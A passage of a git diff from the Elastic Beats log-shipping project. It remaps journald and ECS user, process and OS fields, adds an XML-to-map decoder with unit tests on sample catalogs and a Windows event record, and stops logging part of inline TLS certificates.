auditLoginUid != uid { + putStringIfNotEmtpy("user.effective.id", uid, fields) + putStringIfNotEmtpy("user.effective.group.id", gid, fields) + } else { + putStringIfNotEmtpy("user.id", uid, fields) + putStringIfNotEmtpy("user.group.id", gid, fields) + } +} + +var cmdlineRegexp = regexp.MustCompile(`"(\\"|[^"])*?"|[^\s]+`) + +func setProcessFields(prefix string, fields common.MapStr) { + if found, _ := fields.HasKey(prefix + ".pid"); found { + pid := getIntegerFromFields(prefix+".pid", fields) + fields.Put("process.pid", pid) + } + + name := getStringFromFields(prefix+".name", fields) + if name != "" { + fields.Put("process.name", name) + } + + executable := getStringFromFields(prefix+".executable", fields) + if executable != "" { + fields.Put("process.executable", executable) + } + + cmdline := getStringFromFields(prefix+".process.command_line", fields) + if cmdline == "" { + return + } + + fields.Put("process.command_line", cmdline) + + args := cmdlineRegexp.FindAllString(cmdline, -1) + if len(args) > 0 { + fields.Put("process.args", args) + fields.Put("process.args_count", len(args)) + } +} + +func getStringFromFields(key string, fields common.MapStr) string { + value, _ := fields.GetValue(key) + str, _ := value.(string) + return str +} + +func getIntegerFromFields(key string, fields common.MapStr) int64 { + value, _ := fields.GetValue(key) + i, _ := value.(int64) + return i +} + +func putStringIfNotEmtpy(k, v string, fields common.MapStr) { + if v == "" { + return + } + fields.Put(k, v) +} + // helpers for creating a field conversion table. var ignoredField = Conversion{Dropped: true} diff --git a/journalbeat/pkg/journalfield/conv_test.go b/journalbeat/pkg/journalfield/conv_test.go index a6514a955455..6625d8e1dc10 100644 --- a/journalbeat/pkg/journalfield/conv_test.go +++ b/journalbeat/pkg/journalfield/conv_test.go @@ -39,8 +39,10 @@ func TestConversion(t *testing.T) { sdjournal.SD_JOURNAL_FIELD_BOOT_ID: "123456", }, want: common.MapStr{ - "host": common.MapStr{ - "boot_id": "123456", + "journald": common.MapStr{ + "host": common.MapStr{ + "boot_id": "123456", + }, }, }, }, diff --git a/journalbeat/pkg/journalfield/default.go b/journalbeat/pkg/journalfield/default.go index a8b3860e9561..7c852a44c53a 100644 --- a/journalbeat/pkg/journalfield/default.go +++ b/journalbeat/pkg/journalfield/default.go @@ -28,9 +28,9 @@ var journaldEventFields = FieldConversion{ "COREDUMP_USER_UNIT": text("journald.coredump.user_unit"), "OBJECT_AUDIT_LOGINUID": integer("journald.object.audit.login_uid"), "OBJECT_AUDIT_SESSION": integer("journald.object.audit.session"), - "OBJECT_CMDLINE": text("journald.object.cmd"), - "OBJECT_COMM": text("journald.object.name"), - "OBJECT_EXE": text("journald.object.executable"), + "OBJECT_CMDLINE": text("journald.object.process.command_line"), + "OBJECT_COMM": text("journald.object.process.name"), + "OBJECT_EXE": text("journald.object.process.executable"), "OBJECT_GID": integer("journald.object.gid"), "OBJECT_PID": integer("journald.object.pid"), "OBJECT_SYSTEMD_OWNER_UID": integer("journald.object.systemd.owner_uid"), @@ -45,21 +45,21 @@ var journaldEventFields = FieldConversion{ "_UDEV_DEVLINK": text("journald.kernel.device_symlinks"), "_UDEV_DEVNODE": text("journald.kernel.device_node_path"), "_UDEV_SYSNAME": text("journald.kernel.device_name"), - sdjournal.SD_JOURNAL_FIELD_AUDIT_LOGINUID: integer("process.audit.login_uid"), - sdjournal.SD_JOURNAL_FIELD_AUDIT_SESSION: text("process.audit.session"), - sdjournal.SD_JOURNAL_FIELD_BOOT_ID: text("host.boot_id"), - sdjournal.SD_JOURNAL_FIELD_CAP_EFFECTIVE: text("process.capabilites"), - sdjournal.SD_JOURNAL_FIELD_CMDLINE: text("process.cmd"), + sdjournal.SD_JOURNAL_FIELD_AUDIT_LOGINUID: integer("journald.audit.login_uid"), + sdjournal.SD_JOURNAL_FIELD_AUDIT_SESSION: text("journald.audit.session"), + sdjournal.SD_JOURNAL_FIELD_BOOT_ID: text("journald.host.boot_id"), + sdjournal.SD_JOURNAL_FIELD_CAP_EFFECTIVE: text("journald.process.capabilites"), + sdjournal.SD_JOURNAL_FIELD_CMDLINE: text("journald.process.command_line"), sdjournal.SD_JOURNAL_FIELD_CODE_FILE: text("journald.code.file"), sdjournal.SD_JOURNAL_FIELD_CODE_FUNC: text("journald.code.func"), sdjournal.SD_JOURNAL_FIELD_CODE_LINE: integer("journald.code.line"), - sdjournal.SD_JOURNAL_FIELD_COMM: text("process.name"), - sdjournal.SD_JOURNAL_FIELD_EXE: text("process.executable"), - sdjournal.SD_JOURNAL_FIELD_GID: integer("process.uid"), + sdjournal.SD_JOURNAL_FIELD_COMM: text("journald.process.name"), + sdjournal.SD_JOURNAL_FIELD_EXE: text("journald.process.executable"), + sdjournal.SD_JOURNAL_FIELD_GID: integer("journald.gid"), sdjournal.SD_JOURNAL_FIELD_HOSTNAME: text("host.hostname"), sdjournal.SD_JOURNAL_FIELD_MACHINE_ID: text("host.id"), sdjournal.SD_JOURNAL_FIELD_MESSAGE: text("message"), - sdjournal.SD_JOURNAL_FIELD_PID: integer("process.pid"), + sdjournal.SD_JOURNAL_FIELD_PID: integer("journald.pid"), sdjournal.SD_JOURNAL_FIELD_PRIORITY: integer("syslog.priority", "log.syslog.priority"), sdjournal.SD_JOURNAL_FIELD_SYSLOG_FACILITY: integer("syslog.facility", "log.syslog.facility.name"), sdjournal.SD_JOURNAL_FIELD_SYSLOG_IDENTIFIER: text("syslog.identifier"), @@ -71,7 +71,7 @@ var journaldEventFields = FieldConversion{ sdjournal.SD_JOURNAL_FIELD_SYSTEMD_UNIT: text("systemd.unit"), sdjournal.SD_JOURNAL_FIELD_SYSTEMD_USER_UNIT: text("systemd.user_unit"), sdjournal.SD_JOURNAL_FIELD_TRANSPORT: text("systemd.transport"), - sdjournal.SD_JOURNAL_FIELD_UID: integer("process.uid"), + sdjournal.SD_JOURNAL_FIELD_UID: integer("journald.uid"), // docker journald fields from: https://docs.docker.com/config/containers/logging/journald/ "CONTAINER_ID": text("container.id_truncated"), diff --git a/journalbeat/pkg/journalfield/default_other.go b/journalbeat/pkg/journalfield/default_other.go index ca3d26c92668..5e25ccbf1340 100644 --- a/journalbeat/pkg/journalfield/default_other.go +++ b/journalbeat/pkg/journalfield/default_other.go @@ -26,9 +26,9 @@ var journaldEventFields = FieldConversion{ "COREDUMP_USER_UNIT": text("journald.coredump.user_unit"), "OBJECT_AUDIT_LOGINUID": integer("journald.object.audit.login_uid"), "OBJECT_AUDIT_SESSION": integer("journald.object.audit.session"), - "OBJECT_CMDLINE": text("journald.object.cmd"), - "OBJECT_COMM": text("journald.object.name"), - "OBJECT_EXE": text("journald.object.executable"), + "OBJECT_CMDLINE": text("journald.object.process.command_line"), + "OBJECT_COMM": text("journald.object.process.name"), + "OBJECT_EXE": text("journald.object.process.executable"), "OBJECT_GID": integer("journald.object.gid"), "OBJECT_PID": integer("journald.object.pid"), "OBJECT_SYSTEMD_OWNER_UID": integer("journald.object.systemd.owner_uid"), diff --git a/journalbeat/reader/journal.go b/journalbeat/reader/journal.go index 6b3136d65c66..10aa382a1421 100644 --- a/journalbeat/reader/journal.go +++ b/journalbeat/reader/journal.go @@ -39,23 +39,23 @@ type Reader struct { r *journalread.Reader journal *sdjournal.Journal config Config - done chan struct{} + ctx ctxtool.CancelContext logger *logp.Logger backoff backoff.Backoff } // New creates a new journal reader and moves the FP to the configured position. -func New(c Config, done chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { +func New(c Config, done <-chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { return newReader(c.Path, c, done, state, logger) } // NewLocal creates a reader to read form the local journal and moves the FP // to the configured position. -func NewLocal(c Config, done chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { +func NewLocal(c Config, done <-chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { return newReader(LocalSystemJournalID, c, done, state, logger) } -func newReader(path string, c Config, done chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { +func newReader(path string, c Config, done <-chan struct{}, state checkpoint.JournalState, logger *logp.Logger) (*Reader, error) { logger = logger.With("path", path) backoff := backoff.NewExpBackoff(done, c.Backoff, c.MaxBackoff) @@ -79,7 +79,7 @@ func newReader(path string, c Config, done chan struct{}, state checkpoint.Journ r: r, journal: journal, config: c, - done: done, + ctx: ctxtool.WithCancelContext(ctxtool.FromChannel(done)), logger: logger, backoff: backoff, }, nil @@ -100,13 +100,14 @@ func seekBy(log *logp.Logger, c Config, state checkpoint.JournalState) (journalr // Close closes the underlying journal reader. func (r *Reader) Close() { instance.StopMonitoringJournal(r.config.Path) + r.ctx.Cancel() r.r.Close() } // Next waits until a new event shows up and returns it. // It blocks until an event is returned or an error occurs. func (r *Reader) Next() (*beat.Event, error) { - entry, err := r.r.Next(ctxtool.FromChannel(r.done)) + entry, err := r.r.Next(r.ctx) if err != nil { return nil, err } diff --git a/libbeat/Dockerfile b/libbeat/Dockerfile index cc9829656ed7..6c99894603cf 100644 --- a/libbeat/Dockerfile +++ b/libbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/libbeat/_meta/fields.ecs.yml b/libbeat/_meta/fields.ecs.yml index e3bfd964a51b..d3e0aeda3b64 100644 --- a/libbeat/_meta/fields.ecs.yml +++ b/libbeat/_meta/fields.ecs.yml @@ -1,5 +1,5 @@ # WARNING! Do not edit this file directly, it was generated by the ECS project, -# based on ECS version 1.7.0. +# based on ECS version 1.8.0-dev. # Please visit https://github.com/elastic/ecs to suggest changes to ECS fields. - key: ecs @@ -1356,7 +1356,8 @@ description: 'Raw text message of entire event. Used to demonstrate log integrity. This field is not indexed and doc_values are disabled. It cannot be searched, - but it can be retrieved from `_source`.' + but it can be retrieved from `_source`. If users wish to override this and + index this field, consider using the wildcard data type.' example: Sep 19 08:26:10 host CEF:0|Security| threatmanager|1.0|100| worm successfully stopped|10|src=10.0.0.1 dst=2.1.2.2spt=1232 index: false @@ -1413,7 +1414,7 @@ ignore_above: 1024 description: 'Reference URL linking to additional information about this event. - This URL links to a static definition of the this event. Alert events, indicated + This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field.' example: https://system.example.com/event/#0001234 default_field: false @@ -2214,6 +2215,21 @@ ignore_above: 1024 description: Operating system platform (such centos, ubuntu, windows). example: darwin + - name: os.type + level: extended + type: keyword + ignore_above: 1024 + description: 'Use the `os.type` field to categorize the operating system into + one of the broad commercial families. + + One of these following values should be used (lowercase): linux, macos, unix, + windows. + + If the OS you''re dealing with is not in the list, the field should not be + populated. Please let us know by opening an issue with ECS, to propose its + addition.' + example: macos + default_field: false - name: os.version level: extended type: keyword @@ -2973,6 +2989,21 @@ ignore_above: 1024 description: Operating system platform (such centos, ubuntu, windows). example: darwin + - name: os.type + level: extended + type: keyword + ignore_above: 1024 + description: 'Use the `os.type` field to categorize the operating system into + one of the broad commercial families. + + One of these following values should be used (lowercase): linux, macos, unix, + windows. + + If the OS you''re dealing with is not in the list, the field should not be + populated. Please let us know by opening an issue with ECS, to propose its + addition.' + example: macos + default_field: false - name: os.version level: extended type: keyword @@ -3081,6 +3112,21 @@ ignore_above: 1024 description: Operating system platform (such centos, ubuntu, windows). example: darwin + - name: type + level: extended + type: keyword + ignore_above: 1024 + description: 'Use the `os.type` field to categorize the operating system into + one of the broad commercial families. + + One of these following values should be used (lowercase): linux, macos, unix, + windows. + + If the OS you''re dealing with is not in the list, the field should not be + populated. Please let us know by opening an issue with ECS, to propose its + addition.' + example: macos + default_field: false - name: version level: extended type: keyword @@ -5296,7 +5342,11 @@ description: 'Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain - name. In this case, the IP address would go to the `domain` field.' + name. In this case, the IP address would go to the `domain` field. + + If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC + 2732), the `[` and `]` characters should also be captured in the `domain` + field.' example: www.elastic.co - name: extension level: extended @@ -5437,6 +5487,85 @@ provide an array that includes all of them.' type: group fields: + - name: changes.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the user is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: changes.email + level: extended + type: keyword + ignore_above: 1024 + description: User email address. + default_field: false + - name: changes.full_name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: User's full name, if available. + example: Albert Einstein + default_field: false + - name: changes.group.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the group is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: changes.group.id + level: extended + type: keyword + ignore_above: 1024 + description: Unique identifier for the group on the system/platform. + default_field: false + - name: changes.group.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the group. + default_field: false + - name: changes.hash + level: extended + type: keyword + ignore_above: 1024 + description: 'Unique user hash to correlate information for a user in anonymized + form. + + Useful if `user.id` or `user.name` contain confidential information and cannot + be used.' + default_field: false + - name: changes.id + level: core + type: keyword + ignore_above: 1024 + description: Unique identifier of the user. + default_field: false + - name: changes.name + level: core + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: Short name or login of the user. + example: albert + default_field: false + - name: changes.roles + level: extended + type: keyword + ignore_above: 1024 + description: Array of user roles at the time of the event. + example: '["kibana_admin", "reporting_user"]' + default_field: false - name: domain level: extended type: keyword @@ -5444,6 +5573,85 @@ description: 'Name of the directory the user is a member of. For example, an LDAP or Active Directory domain name.' + - name: effective.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the user is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: effective.email + level: extended + type: keyword + ignore_above: 1024 + description: User email address. + default_field: false + - name: effective.full_name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: User's full name, if available. + example: Albert Einstein + default_field: false + - name: effective.group.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the group is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: effective.group.id + level: extended + type: keyword + ignore_above: 1024 + description: Unique identifier for the group on the system/platform. + default_field: false + - name: effective.group.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the group. + default_field: false + - name: effective.hash + level: extended + type: keyword + ignore_above: 1024 + description: 'Unique user hash to correlate information for a user in anonymized + form. + + Useful if `user.id` or `user.name` contain confidential information and cannot + be used.' + default_field: false + - name: effective.id + level: core + type: keyword + ignore_above: 1024 + description: Unique identifier of the user. + default_field: false + - name: effective.name + level: core + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: Short name or login of the user. + example: albert + default_field: false + - name: effective.roles + level: extended + type: keyword + ignore_above: 1024 + description: Array of user roles at the time of the event. + example: '["kibana_admin", "reporting_user"]' + default_field: false - name: email level: extended type: keyword @@ -5509,6 +5717,85 @@ description: Array of user roles at the time of the event. example: '["kibana_admin", "reporting_user"]' default_field: false + - name: target.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the user is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: target.email + level: extended + type: keyword + ignore_above: 1024 + description: User email address. + default_field: false + - name: target.full_name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: User's full name, if available. + example: Albert Einstein + default_field: false + - name: target.group.domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the directory the group is a member of. + + For example, an LDAP or Active Directory domain name.' + default_field: false + - name: target.group.id + level: extended + type: keyword + ignore_above: 1024 + description: Unique identifier for the group on the system/platform. + default_field: false + - name: target.group.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the group. + default_field: false + - name: target.hash + level: extended + type: keyword + ignore_above: 1024 + description: 'Unique user hash to correlate information for a user in anonymized + form. + + Useful if `user.id` or `user.name` contain confidential information and cannot + be used.' + default_field: false + - name: target.id + level: core + type: keyword + ignore_above: 1024 + description: Unique identifier of the user. + default_field: false + - name: target.name + level: core + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + description: Short name or login of the user. + example: albert + default_field: false + - name: target.roles + level: extended + type: keyword + ignore_above: 1024 + description: Array of user roles at the time of the event. + example: '["kibana_admin", "reporting_user"]' + default_field: false - name: user_agent title: User agent group: 2 @@ -5580,6 +5867,21 @@ ignore_above: 1024 description: Operating system platform (such centos, ubuntu, windows). example: darwin + - name: os.type + level: extended + type: keyword + ignore_above: 1024 + description: 'Use the `os.type` field to categorize the operating system into + one of the broad commercial families. + + One of these following values should be used (lowercase): linux, macos, unix, + windows. + + If the OS you''re dealing with is not in the list, the field should not be + populated. Please let us know by opening an issue with ECS, to propose its + addition.' + example: macos + default_field: false - name: os.version level: extended type: keyword diff --git a/libbeat/cmd/instance/imports_common.go b/libbeat/cmd/instance/imports_common.go index e47dbf937993..ac767a559645 100644 --- a/libbeat/cmd/instance/imports_common.go +++ b/libbeat/cmd/instance/imports_common.go @@ -30,6 +30,7 @@ import ( _ "github.com/elastic/beats/v7/libbeat/processors/add_process_metadata" _ "github.com/elastic/beats/v7/libbeat/processors/communityid" _ "github.com/elastic/beats/v7/libbeat/processors/convert" + _ "github.com/elastic/beats/v7/libbeat/processors/decode_xml" _ "github.com/elastic/beats/v7/libbeat/processors/dissect" _ "github.com/elastic/beats/v7/libbeat/processors/dns" _ "github.com/elastic/beats/v7/libbeat/processors/extract_array" diff --git a/libbeat/common/encoding/xml/decode.go b/libbeat/common/encoding/xml/decode.go new file mode 100644 index 000000000000..665c0608f67e --- /dev/null +++ b/libbeat/common/encoding/xml/decode.go @@ -0,0 +1,120 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package xml + +import ( + "bytes" + "encoding/xml" + "io" + "strings" +) + +// A Decoder reads and decodes XML from an input stream. +type Decoder struct { + prependHyphenToAttr bool + lowercaseKeys bool + xmlDec *xml.Decoder +} + +// NewDecoder returns a new decoder that reads from r. +func NewDecoder(r io.Reader) *Decoder { + return &Decoder{xmlDec: xml.NewDecoder(r)} +} + +// PrependHyphenToAttr causes the Decoder to prepend a hyphen ('-') to to all +// XML attribute names. +func (d *Decoder) PrependHyphenToAttr() { d.prependHyphenToAttr = true } + +// LowercaseKeys causes the Decoder to transform all key name to lowercase. +func (d *Decoder) LowercaseKeys() { d.lowercaseKeys = true } + +// Decode reads XML from the input stream and return a map containing the data. +func (d *Decoder) Decode() (map[string]interface{}, error) { + _, m, err := d.decode(nil) + return m, err +} + +func (d *Decoder) decode(attrs []xml.Attr) (string, map[string]interface{}, error) { + elements := map[string]interface{}{} + var cdata string + + for { + t, err := d.xmlDec.Token() + if err != nil { + if err == io.EOF { + return "", elements, nil + } + return "", nil, err + } + + switch elem := t.(type) { + case xml.StartElement: + cdata, subElements, err := d.decode(elem.Attr) + if err != nil { + return "", nil, err + } + + // Combine sub-elements and cdata. + var add interface{} = subElements + if len(subElements) == 0 { + add = cdata + } else if len(cdata) > 0 { + subElements["#text"] = cdata + } + + // Add the data to the current object while taking into account + // if the current key already exists (in the case of lists). + key := d.key(elem.Name.Local) + value := elements[elem.Name.Local] + switch v := value.(type) { + case nil: + elements[key] = add + case []interface{}: + elements[key] = append(v, add) + default: + elements[key] = []interface{}{v, add} + } + case xml.CharData: + cdata = string(bytes.TrimSpace(elem.Copy())) + case xml.EndElement: + d.addAttributes(attrs, elements) + return cdata, elements, nil + } + } +} + +func (d *Decoder) addAttributes(attrs []xml.Attr, m map[string]interface{}) { + for _, attr := range attrs { + key := d.attrKey(attr.Name.Local) + m[key] = attr.Value + } +} + +func (d *Decoder) key(in string) string { + if d.lowercaseKeys { + return strings.ToLower(in) + } + return in +} + +func (d *Decoder) attrKey(in string) string { + if d.prependHyphenToAttr { + return d.key("-" + in) + } + return d.key(in) +} diff --git a/libbeat/common/encoding/xml/decode_test.go b/libbeat/common/encoding/xml/decode_test.go new file mode 100644 index 000000000000..277972e56da6 --- /dev/null +++ b/libbeat/common/encoding/xml/decode_test.go @@ -0,0 +1,431 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +// +build !integration + +package xml + +import ( + "encoding/json" + "fmt" + "os" + "strings" + "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" +) + +func TestIncompleteXML(t *testing.T) { + const xml = ` + + John +` + + d := NewDecoder(strings.NewReader(xml)) + out, err := d.Decode() + assert.Nil(t, out) + require.Error(t, err) + assert.Contains(t, err.Error(), "unexpected EOF") +} + +func TestLowercaseKeys(t *testing.T) { + const xml = ` + + John + +` + + expected := map[string]interface{}{ + "person": map[string]interface{}{ + "name": map[string]interface{}{ + "#text": "John", + "id": "123", + }, + }, + } + + d := NewDecoder(strings.NewReader(xml)) + d.LowercaseKeys() + out, err := d.Decode() + require.NoError(t, err) + assert.Equal(t, expected, out) +} + +func TestPrependHyphenToAttr(t *testing.T) { + const xml = ` + + John + +` + + expected := map[string]interface{}{ + "person": map[string]interface{}{ + "Name": map[string]interface{}{ + "#text": "John", + "-ID": "123", + }, + }, + } + + d := NewDecoder(strings.NewReader(xml)) + d.PrependHyphenToAttr() + out, err := d.Decode() + require.NoError(t, err) + assert.Equal(t, expected, out) +} + +func TestDecodeList(t *testing.T) { + const xml = ` + + + John + + + Jane + + Foo + +` + + expected := map[string]interface{}{ + "people": map[string]interface{}{ + "person": []interface{}{ + map[string]interface{}{ + "Name": map[string]interface{}{ + "#text": "John", + "ID": "123", + }, + }, + map[string]interface{}{ + "Name": map[string]interface{}{ + "#text": "Jane", + "ID": "456", + }, + }, + "Foo", + }, + }, + } + + d := NewDecoder(strings.NewReader(xml)) + out, err := d.Decode() + require.NoError(t, err) + assert.Equal(t, expected, out) +} + +func TestEmptyElement(t *testing.T) { + const xml = ` + + +` + + expected := map[string]interface{}{ + "people": "", + } + + d := NewDecoder(strings.NewReader(xml)) + out, err := d.Decode() + require.NoError(t, err) + assert.Equal(t, expected, out) +} + +func TestDecode(t *testing.T) { + type testCase struct { + XML string + Output map[string]interface{} + } + + tests := []testCase{ + { + XML: ` + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + `, + Output: map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": map[string]interface{}{ + "author": "William H. Gaddis", + "review": "One of the great seminal American novels of the 20th century.", + "seq": "1", + "title": "The Recognitions"}}}, + }, + { + XML: ` + + + Gambardella, Matthew + XML Developer's Guide + Computer + 44.95 + 2000-10-01 + An in-depth look at creating applications with XML. + + + Ralls, Kim + Midnight Rain + Fantasy + 5.95 + 2000-12-16 + A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world. + + `, + Output: map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": []interface{}{ + map[string]interface{}{ + "author": "Gambardella, Matthew", + "description": "An in-depth look at creating applications with XML.", + "genre": "Computer", + "id": "bk101", + "price": "44.95", + "publish_date": "2000-10-01", + "title": "XML Developer's Guide", + }, + map[string]interface{}{ + "author": "Ralls, Kim", + "description": "A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world.", + "genre": "Fantasy", + "id": "bk102", + "price": "5.95", + "publish_date": "2000-12-16", + "title": "Midnight Rain"}}}}, + }, + { + XML: ` + + + + Gambardella, Matthew + XML Developer's Guide + Computer + 44.95 + 2000-10-01 + An in-depth look at creating applications with XML. + + + Ralls, Kim + Midnight Rain + Fantasy + 5.95 + 2000-12-16 + A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world. + + `, + Output: map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": []interface{}{ + map[string]interface{}{ + "author": "Gambardella, Matthew", + "description": "An in-depth look at creating applications with XML.", + "genre": "Computer", + "id": "bk101", + "price": "44.95", + "publish_date": "2000-10-01", + "title": "XML Developer's Guide"}, + map[string]interface{}{ + "author": "Ralls, Kim", + "description": "A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world.", + "genre": "Fantasy", + "id": "bk102", + "price": "5.95", + "publish_date": "2000-12-16", + "title": "Midnight Rain"}}}}, + }, + { + XML: ` + + + + Gambardella, Matthew + XML Developer's Guide + Computer + 44.95 + 2000-10-01 + An in-depth look at creating applications with XML. + + + + Ralls, Kim + A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world. + + + `, + Output: map[string]interface{}{ + "catalog": map[string]interface{}{ + "book": map[string]interface{}{ + "author": "Gambardella, Matthew", + "description": "An in-depth look at creating applications with XML.", + "genre": "Computer", + "id": "bk101", + "price": "44.95", + "publish_date": "2000-10-01", + "title": "XML Developer's Guide"}, + "secondcategory": map[string]interface{}{ + "paper": map[string]interface{}{ + "description": "A former architect battles corporate zombies, an evil sorceress, and her own childhood to become queen of the world.", + "id": "bk102", + "test2": "Ralls, Kim"}}}}, + }, + } + + for i, test := range tests { + t.Run(fmt.Sprintf("%d", i), func(t *testing.T) { + d := NewDecoder(strings.NewReader(test.XML)) + d.LowercaseKeys() + + out, err := d.Decode() + require.NoError(t, err) + assert.EqualValues(t, test.Output, out) + }) + } +} + +func ExampleDecoder_Decode() { + const xml = ` + + + + 91 + 1 + 4 + 9 + 0 + 0x8020000000000000 + + 100 + + + Microsoft-Windows-WinRM/Operational + vagrant-2012-r2 + + + + winlogbeat + running + 770069006E006C006F00670062006500610074002F0034000000 + + + + \\VAGRANT-2012-R2 + vagrant + + + + 15005 + shellId + 68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000 + + + Creating WSMan shell on server with ResourceUri: %1 + Information + Request handling + Info + Microsoft-Windows-WinRM/Operational + Microsoft-Windows-Windows Remote Management + + Server + + + +} +` + dec := NewDecoder(strings.NewReader(xml)) + dec.LowercaseKeys() + m, err := dec.Decode() + if err != nil { + return + } + + enc := json.NewEncoder(os.Stdout) + enc.SetIndent("", " ") + if err = enc.Encode(m); err != nil { + return + } + + // Output: + // { + // "event": { + // "eventdata": { + // "binary": "770069006E006C006F00670062006500610074002F0034000000", + // "data": { + // "#text": "running", + // "name": "param2" + // } + // }, + // "processingerrordata": { + // "dataitemname": "shellId", + // "errorcode": "15005", + // "eventpayload": "68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000" + // }, + // "renderinginfo": { + // "channel": "Microsoft-Windows-WinRM/Operational", + // "culture": "en-US", + // "keywords": { + // "keyword": "Server" + // }, + // "level": "Information", + // "message": "Creating WSMan shell on server with ResourceUri: %1", + // "opcode": "Info", + // "provider": "Microsoft-Windows-Windows Remote Management", + // "task": "Request handling" + // }, + // "system": { + // "channel": "Microsoft-Windows-WinRM/Operational", + // "computer": "vagrant-2012-r2", + // "correlation": { + // "activityid": "{A066CCF1-8AB3-459B-B62F-F79F957A5036}", + // "relatedactivityid": "{85FC0930-9C49-42DA-804B-A7368104BD1B}" + // }, + // "eventid": "91", + // "eventrecordid": "100", + // "execution": { + // "processid": "920", + // "threadid": "1152" + // }, + // "keywords": "0x8020000000000000", + // "level": "4", + // "opcode": "0", + // "provider": { + // "eventsourcename": "Service Control Manager", + // "guid": "{a7975c8f-ac13-49f1-87da-5a984a4ab417}", + // "name": "Microsoft-Windows-WinRM" + // }, + // "security": { + // "userid": "S-1-5-21-3541430928-2051711210-1391384369-1001" + // }, + // "task": "9", + // "timecreated": { + // "systemtime": "2016-01-28T20:33:27.990735300Z" + // }, + // "version": "1" + // }, + // "userdata": { + // "eventxml": { + // "servername": "\\\\VAGRANT-2012-R2", + // "username": "vagrant", + // "xmlns": "Event_NS" + // } + // }, + // "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + // } + // } +} diff --git a/libbeat/common/transport/tlscommon/tls.go b/libbeat/common/transport/tlscommon/tls.go index ba44310727c5..e5388eaf8ce3 100644 --- a/libbeat/common/transport/tlscommon/tls.go +++ b/libbeat/common/transport/tlscommon/tls.go @@ -214,9 +214,7 @@ type PEMReader struct { // NewPEMReader returns a new PEMReader. func NewPEMReader(certificate string) (*PEMReader, error) { if IsPEMString(certificate) { - // Take a substring of the certificate so we do not leak the whole certificate or private key in the log. - debugStr := certificate[0:256] + "..." - return &PEMReader{reader: ioutil.NopCloser(strings.NewReader(certificate)), debugStr: debugStr}, nil + return &PEMReader{reader: ioutil.NopCloser(strings.NewReader(certificate)), debugStr: "inline"}, nil } r, err := os.Open(certificate) diff --git a/libbeat/common/transport/tlscommon/tls_test.go b/libbeat/common/transport/tlscommon/tls_test.go 